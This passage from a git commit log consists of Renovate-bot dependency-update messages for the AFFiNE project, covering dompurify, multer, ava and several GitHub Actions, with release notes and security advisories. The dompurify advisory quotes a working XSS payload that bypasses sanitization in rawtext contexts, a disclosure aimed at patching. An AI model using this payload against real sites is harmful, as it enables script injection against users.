[#​60893](https://redirect.github.com/nodejs/node/pull/60893) - \[[`c2ba56d6b2`](https://redirect.github.com/nodejs/node/commit/c2ba56d6b2)] - **src,permission**: fix permission.has on empty param (Rafael Gonzaga) [#​60674](https://redirect.github.com/nodejs/node/pull/60674) - \[[`e55a2b895a`](https://redirect.github.com/nodejs/node/commit/e55a2b895a)] - **src,permission**: add debug log on is\_tree\_granted (Rafael Gonzaga) [#​60668](https://redirect.github.com/nodejs/node/pull/60668) - \[[`902a78b43c`](https://redirect.github.com/nodejs/node/commit/902a78b43c)] - **stream**: fix isErrored/isWritable for WritableStreams (René) [#​60905](https://redirect.github.com/nodejs/node/pull/60905) - \[[`221b77cf41`](https://redirect.github.com/nodejs/node/commit/221b77cf41)] - **stream**: don't try to read more if reading (Robert Nagy) [#​60454](https://redirect.github.com/nodejs/node/pull/60454) - \[[`46d12d826f`](https://redirect.github.com/nodejs/node/commit/46d12d826f)] - **test**: skip strace test with shared openssl (Richard Lau) [#​61987](https://redirect.github.com/nodejs/node/pull/61987) - \[[`52e6b01a44`](https://redirect.github.com/nodejs/node/commit/52e6b01a44)] - **test**: mark `test-strace-openat-openssl` as flaky (Antoine du Hamel) [#​61921](https://redirect.github.com/nodejs/node/pull/61921) - \[[`4d7468d0e0`](https://redirect.github.com/nodejs/node/commit/4d7468d0e0)] - **test**: skip --build-sea tests on platforms where SEA is flaky (Joyee Cheung) [#​61504](https://redirect.github.com/nodejs/node/pull/61504) - \[[`f604b7ae67`](https://redirect.github.com/nodejs/node/commit/f604b7ae67)] - **test**: fix flaky debugger test (Ryuhei Shima) [#​58324](https://redirect.github.com/nodejs/node/pull/58324) - \[[`fc2dc4024b`](https://redirect.github.com/nodejs/node/commit/fc2dc4024b)] - **test**: ensure removeListener event fires for once() listeners (sangwook) [#​60137](https://redirect.github.com/nodejs/node/pull/60137) - \[[`5fba382816`](https://redirect.github.com/nodejs/node/commit/5fba382816)] - **test**: delay writing the files only on macOS (Luigi Pinca) [#​61532](https://redirect.github.com/nodejs/node/pull/61532) - \[[`85cc9e20e4`](https://red </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My41OS4wIiwidXBkYXRlZEluVmVyIjoiNDMuNTkuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
09fa1a8e4e |
chore: bump up dompurify version to v3.3.2 [SECURITY] (#14581)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [dompurify](https://redirect.github.com/cure53/DOMPurify) | [`3.3.0` → `3.3.2`](https://renovatebot.com/diffs/npm/dompurify/3.3.0/3.3.2) |  |  | ### GitHub Vulnerability Alerts #### [CVE-2026-0540](https://nvd.nist.gov/vuln/detail/CVE-2026-0540) DOMPurify 3.1.3 through 3.3.1 and 2.5.3 through 2.5.8, fixed in 2.5.9 and 3.3.2, contain a cross-site scripting vulnerability that allows attackers to bypass attribute sanitization by exploiting five missing rawtext elements (noscript, xmp, noembed, noframes, iframe) in the `SAFE_FOR_XML` regex. Attackers can include payloads like `</noscript><img src=x onerror=alert(1)>` in attribute values to execute JavaScript when sanitized output is placed inside these unprotected rawtext contexts. --- ### Release Notes <details> <summary>cure53/DOMPurify (dompurify)</summary> ### [`v3.3.2`](https://redirect.github.com/cure53/DOMPurify/releases/tag/3.3.2): DOMPurify 3.3.2 [Compare Source](https://redirect.github.com/cure53/DOMPurify/compare/3.3.1...3.3.2) - Fixed a possible bypass caused by jsdom's faulty raw-text tag parsing, thanks multiple reporters - Fixed a prototype pollution issue when working with custom elements, thanks [@​christos-eth](https://redirect.github.com/christos-eth) - Fixed a lenient config parsing in `_isValidAttribute`, thanks [@​christos-eth](https://redirect.github.com/christos-eth) - Bumped and removed several dependencies, thanks [@​Rotzbua](https://redirect.github.com/Rotzbua) - Fixed the test suite after bumping dependencies, thanks [@​Rotzbua](https://redirect.github.com/Rotzbua) ### [`v3.3.1`](https://redirect.github.com/cure53/DOMPurify/releases/tag/3.3.1): DOMPurify 3.3.1 [Compare Source](https://redirect.github.com/cure53/DOMPurify/compare/3.3.0...3.3.1) - Updated `ADD_FORBID_CONTENTS` setting to extend default list, thanks [@​MariusRumpf](https://redirect.github.com/MariusRumpf) - Updated the ESM import syntax to be more correct, thanks [@​binhpv](https://redirect.github.com/binhpv) </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My41Ni4wIiwidXBkYXRlZEluVmVyIjoiNDMuNTYuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
bbc01533d7 |
chore: bump up multer version to v2.1.1 [SECURITY] (#14576)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [multer](https://redirect.github.com/expressjs/multer) | [`2.1.0` → `2.1.1`](https://renovatebot.com/diffs/npm/multer/2.1.0/2.1.1) |  |  | ### GitHub Vulnerability Alerts #### [CVE-2026-2359](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc) ### Impact A vulnerability in Multer versions < 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by dropping connection during file upload, potentially causing resource exhaustion. ### Patches Users should upgrade to `2.1.0` ### Workarounds None #### [CVE-2026-3304](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p) ### Impact A vulnerability in Multer versions < 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing resource exhaustion. ### Patches Users should upgrade to `2.1.0` ### Workarounds None #### [CVE-2026-3520](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2) ### Impact A vulnerability in Multer versions < 2.1.1 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing stack overflow. ### Patches Users should upgrade to `2.1.1` ### Workarounds None ### Resources - https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2 - https://www.cve.org/CVERecord?id=CVE-2026-3520 - https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752 - https://cna.openjsf.org/security-advisories.html --- ### Release Notes <details> <summary>expressjs/multer (multer)</summary> ### [`v2.1.1`](https://redirect.github.com/expressjs/multer/blob/HEAD/CHANGELOG.md#211) [Compare Source](https://redirect.github.com/expressjs/multer/compare/v2.1.0...v2.1.1) - Fix [CVE-2026-3520](https://www.cve.org/CVERecord?id=CVE-2026-3520) ([GHSA-5528-5vmv-3xc2](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2)) - fix error/abort handling </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My41NS40IiwidXBkYXRlZEluVmVyIjoiNDMuNTUuNCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
fc9b99cd17 |
chore: bump up ava version to v7 (#14563)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [ava](https://avajs.dev) ([source](https://redirect.github.com/avajs/ava)) | [`^6.4.1` → `^7.0.0`](https://renovatebot.com/diffs/npm/ava/6.4.1/7.0.0) |  |  | | [ava](https://avajs.dev) ([source](https://redirect.github.com/avajs/ava)) | [`^6.4.0` → `^7.0.0`](https://renovatebot.com/diffs/npm/ava/6.4.1/7.0.0) |  |  | --- ### Release Notes <details> <summary>avajs/ava (ava)</summary> ### [`v7.0.0`](https://redirect.github.com/avajs/ava/releases/tag/v7.0.0) [Compare Source](https://redirect.github.com/avajs/ava/compare/v6.4.1...v7.0.0) ##### What's Changed - Replace `strip-ansi` with `node:util.stripVTControlCharacters` by [@​fisker](https://redirect.github.com/fisker) in [#​3403](https://redirect.github.com/avajs/ava/pull/3403) - Remove support for Node.js 18 and 23; require 20.19 or newer, 22.20 or newer or 24,12 or newer; update dependencies including transitive `glob` by [@​novemberborn](https://redirect.github.com/novemberborn) in [#​3416](https://redirect.github.com/avajs/ava/pull/3416) **Full Changelog**: <https://github.com/avajs/ava/compare/v6.4.1...v7.0.0> </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about these updates again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40OC4xIiwidXBkYXRlZEluVmVyIjoiNDMuNDguMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
75efa854bf |
chore: bump up apple-actions/import-codesign-certs action to v6 (#14561)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [apple-actions/import-codesign-certs](https://redirect.github.com/apple-actions/import-codesign-certs) | action | major | `v5` → `v6` | --- ### Release Notes <details> <summary>apple-actions/import-codesign-certs (apple-actions/import-codesign-certs)</summary> ### [`v6`](https://redirect.github.com/apple-actions/import-codesign-certs/compare/v5...v6) [Compare Source](https://redirect.github.com/apple-actions/import-codesign-certs/compare/v5...v6) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
c0139abf79 |
chore: bump up actions/setup-java action to v5 (#14554)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [actions/setup-java](https://redirect.github.com/actions/setup-java) | action | major | `v4` → `v5` | --- ### Release Notes <details> <summary>actions/setup-java (actions/setup-java)</summary> ### [`v5`](https://redirect.github.com/actions/setup-java/compare/v4...v5) [Compare Source](https://redirect.github.com/actions/setup-java/compare/v4...v5) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
5a38e765bd |
chore: bump up actions/setup-node action to v6 (#14555)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [actions/setup-node](https://redirect.github.com/actions/setup-node) | action | major | `v4` → `v6` | --- ### Release Notes <details> <summary>actions/setup-node (actions/setup-node)</summary> ### [`v6`](https://redirect.github.com/actions/setup-node/compare/v5...v6) [Compare Source](https://redirect.github.com/actions/setup-node/compare/v5...v6) ### [`v5`](https://redirect.github.com/actions/setup-node/compare/v4...v5) [Compare Source](https://redirect.github.com/actions/setup-node/compare/v4...v5) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
d3dcdd47ee |
chore: bump up actions/setup-python action to v6 (#14556)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [actions/setup-python](https://redirect.github.com/actions/setup-python) | action | major | `v5` → `v6` | --- ### Release Notes <details> <summary>actions/setup-python (actions/setup-python)</summary> ### [`v6`](https://redirect.github.com/actions/setup-python/compare/v5...v6) [Compare Source](https://redirect.github.com/actions/setup-python/compare/v5...v6) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
5464d1a9ce |
chore: bump up multer version to v2.1.0 [SECURITY] (#14544)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [multer](https://redirect.github.com/expressjs/multer) | [`2.0.2` → `2.1.0`](https://renovatebot.com/diffs/npm/multer/2.0.2/2.1.0) |  |  | ### GitHub Vulnerability Alerts #### [CVE-2026-2359](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc) ### Impact A vulnerability in Multer versions < 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by dropping connection during file upload, potentially causing resource exhaustion. ### Patches Users should upgrade to `2.1.0` ### Workarounds None #### [CVE-2026-3304](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p) ### Impact A vulnerability in Multer versions < 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing resource exhaustion. ### Patches Users should upgrade to `2.1.0` ### Workarounds None --- ### Release Notes <details> <summary>expressjs/multer (multer)</summary> ### [`v2.1.0`](https://redirect.github.com/expressjs/multer/blob/HEAD/CHANGELOG.md#210) [Compare Source](https://redirect.github.com/expressjs/multer/compare/v2.0.2...v2.1.0) - Add `defParamCharset` option for UTF-8 filename support ([#​1210](https://redirect.github.com/expressjs/multer/pull/1210)) - Fix [CVE-2026-2359](https://www.cve.org/CVERecord?id=CVE-2026-2359) ([GHSA-v52c-386h-88mc](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc)) - Fix [CVE-2026-3304](https://www.cve.org/CVERecord?id=CVE-2026-3304) ([GHSA-xf7r-hgr6-v32p](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p)) </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
4c40dcacd9 |
chore: bump up actions/setup-go action to v6 (#14553)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [actions/setup-go](https://redirect.github.com/actions/setup-go) | action | major | `v5` → `v6` | --- ### Release Notes <details> <summary>actions/setup-go (actions/setup-go)</summary> ### [`v6`](https://redirect.github.com/actions/setup-go/compare/v5...v6) [Compare Source](https://redirect.github.com/actions/setup-go/compare/v5...v6) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
76d28aaa38 |
chore: bump up @types/supertest version to v7 (#14546)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@types/supertest](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/supertest) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/supertest)) | [`^6.0.2` → `^7.0.0`](https://renovatebot.com/diffs/npm/@types%2fsupertest/6.0.3/7.2.0) |  |  | --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
86f48240ce |
chore: bump up actions/github-script action to v8 (#14551)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [actions/github-script](https://redirect.github.com/actions/github-script) | action | major | `v7` → `v8` | --- ### Release Notes <details> <summary>actions/github-script (actions/github-script)</summary> ### [`v8`](https://redirect.github.com/actions/github-script/releases/tag/v8): .0.0 [Compare Source](https://redirect.github.com/actions/github-script/compare/v7...v8) ##### What's Changed - Update Node.js version support to 24.x by [@​salmanmkc](https://redirect.github.com/salmanmkc) in [#​637](https://redirect.github.com/actions/github-script/pull/637) - README for updating actions/github-script from v7 to v8 by [@​sneha-krip](https://redirect.github.com/sneha-krip) in [#​653](https://redirect.github.com/actions/github-script/pull/653) ##### ⚠️ Minimum Compatible Runner Version **v2.327.1**\ [Release Notes](https://redirect.github.com/actions/runner/releases/tag/v2.327.1) Make sure your runner is updated to this version or newer to use this release. ##### New Contributors - [@​salmanmkc](https://redirect.github.com/salmanmkc) made their first contribution in [#​637](https://redirect.github.com/actions/github-script/pull/637) - [@​sneha-krip](https://redirect.github.com/sneha-krip) made their first contribution in [#​653](https://redirect.github.com/actions/github-script/pull/653) **Full Changelog**: <https://github.com/actions/github-script/compare/v7.1.0...v8.0.0> </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
60acd81d4b |
chore: bump up actions/labeler action to v6 (#14552)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [actions/labeler](https://redirect.github.com/actions/labeler) | action | major | `v5` → `v6` | --- ### Release Notes <details> <summary>actions/labeler (actions/labeler)</summary> ### [`v6`](https://redirect.github.com/actions/labeler/compare/v5...v6) [Compare Source](https://redirect.github.com/actions/labeler/compare/v5...v6) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |